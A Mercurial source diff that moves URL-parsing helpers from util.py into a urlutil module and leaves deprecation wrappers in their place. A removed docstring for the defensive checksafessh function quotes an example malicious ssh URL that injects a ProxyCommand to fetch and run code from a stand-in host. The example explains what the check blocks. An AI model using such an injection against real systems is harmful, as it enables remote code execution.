diff -r 33524c46a092 -r ffd3e823a7e5 mercurial/util.py --- a/mercurial/util.py Sun Apr 11 23:54:35 2021 +0200 +++ b/mercurial/util.py Mon Apr 12 03:01:04 2021 +0200 @@ -28,7 +28,6 @@ import platform as pyplatform import re as remod import shutil -import socket import stat import sys import time @@ -57,6 +56,7 @@ hashutil, procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -65,7 +65,6 @@ List, Optional, Tuple, - Union, ) @@ -2959,420 +2958,52 @@ return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) -def getport(port): - # type: (Union[bytes, int]) -> int - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. - """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise error.Abort( - _(b"no port number associated with service '%s'") % port - ) - - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - ://:@:/?# - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - - >>> url(b'ssh://[::1]:2200//home/joe/repo') - - >>> url(b'file:///home/joe/repo') - - >>> url(b'file:///c:/temp/foo/') - - >>> url(b'bundle:foo') - - >>> url(b'bundle://../foo') - - >>> url(br'c:\foo\bar') - - >>> url(br'\\blah\blah\blah') - - >>> url(br'\\blah\blah\blah#baz') - - >>> url(br'file:///C:\users\me') - - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - - >>> url(b'ssh://joe@x/repo') - - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - - - Empty path: - - >>> url(b'') - - >>> url(b'#a') - - >>> url(b'http://host/') - - >>> url(b'http://host/#a') - - - Only scheme: - - >>> url(b'http:') - - """ - - _safechars = b"!~*'()+" - _safepchars = b"/!~*'()+:\\" - _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # type: (bytes, bool, bool) -> None - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = b'' - self._origpath = path - - if parsefragment and b'#' in path: - path, self.fragment = path.split(b'#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith(b'\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith(b'bundle:'): - self.scheme = b'bundle' - path = path[7:] - if path.startswith(b'//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(b':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = b'' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and b'?' in path: - path, self.query = path.split(b'?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith(b'//'): - parts = path[2:].split(b'/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = b'/' + path - - if self.host and b'@' in self.host: - self.user, self.host = self.host.rsplit(b'@', 1) - if b':' in self.user: - self.user, self.passwd = self.user.split(b':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if ( - self.host - and b':' in self.host - and not ( - self.host.startswith(b'[') and self.host.endswith(b']') - ) - ): - self._hostport = self.host - self.host, self.port = self.host.rsplit(b':', 1) - if not self.host: - self.host = None - - if ( - self.host - and self.scheme == b'file' - and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') - ): - raise error.Abort( - _(b'file:// URLs can only refer to localhost') - ) - - self.path = path - - # leave the query string escaped - for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - def copy(self): - u = url(b'temporary useless value') - u.path = self.path - u.scheme = self.scheme - u.user = self.user - u.passwd = self.passwd - u.host = self.host - u.path = self.path - u.query = self.query - u.fragment = self.fragment - u._localpath = self._localpath - u._hostport = self._hostport - u._origpath = self._origpath - return u - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ( - b'scheme', - b'user', - b'passwd', - b'host', - b'port', - b'path', - b'query', - b'fragment', - ): - v = getattr(self, a) - if v is not None: - attrs.append(b'%s: %r' % (a, pycompat.bytestr(v))) - return b'' % b', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. - - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == b'bundle': - s = b'bundle:' + s - if self.fragment: - s += b'#' + self.fragment - return s - - s = self.scheme + b':' - if self.user or self.passwd or self.host: - s += b'//' - elif self.scheme and ( - not self.path - or self.path.startswith(b'/') - or hasdriveletter(self.path) - ): - s += b'//' - if hasdriveletter(self.path): - s += b'/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += b':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += b'@' - if self.host: - if not (self.host.startswith(b'[') and self.host.endswith(b']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += b':' + urlreq.quote(self.port) - if self.host: - s += b'/' - if self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += b'?' + self.query - if self.fragment is not None: - s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), self.user, self.passwd or b'')) - - def isabs(self): - if self.scheme and self.scheme != b'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith(b'/'): - return True # POSIX-style - return False - - def localpath(self): - # type: () -> bytes - if self.scheme == b'file' or self.scheme == b'bundle': - path = self.path or b'/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. - if hasdriveletter(self._hostport): - path = self._hostport + b'/' + self.path - elif ( - self.host is not None and self.path and not hasdriveletter(path) - ): - path = b'/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return ( - not self.scheme - or self.scheme == b'file' - or self.scheme == b'bundle' - ) - - -def hasscheme(path): - # type: (bytes) -> bool - return bool(url(path).scheme) # cast to help pytype - - -def hasdriveletter(path): - # type: (bytes) -> bool - return bool(path) and path[1:2] == b':' and path[0:1].isalpha() - - -def urllocalpath(path): - # type: (bytes) -> bytes - return url(path, parsequery=False, parsefragment=False).localpath() - - -def checksafessh(path): - # type: (bytes) -> None - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): - raise error.Abort( - _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) - ) - - -def hidepassword(u): - # type: (bytes) -> bytes - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = b'***' - return bytes(u) - - -def removeauth(u): - # type: (bytes) -> bytes - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return bytes(u) +def getport(*args, **kwargs): + msg = b'getport(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.getport(*args, **kwargs) + + +def url(*args, **kwargs): + msg = b'url(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.url(*args, **kwargs) + + +def hasscheme(*args, **kwargs): + msg = b'hasscheme(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasscheme(*args, **kwargs) + + +def hasdriveletter(*args, **kwargs): + msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasdriveletter(*args, **kwargs) + + +def urllocalpath(*args, **kwargs): + msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.urllocalpath(*args, **kwargs) + + +def checksafessh(*args, **kwargs): + msg = b'checksafessh(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.checksafessh(*args, **kwargs) + + +def hidepassword(*args, **kwargs): + msg = b'hidepassword(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hidepassword(*args, **kwargs) + + +def removeauth(*args, **kwargs): + msg = b'removeauth(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.removeauth(*args, **kwargs) timecount = unitcountfn(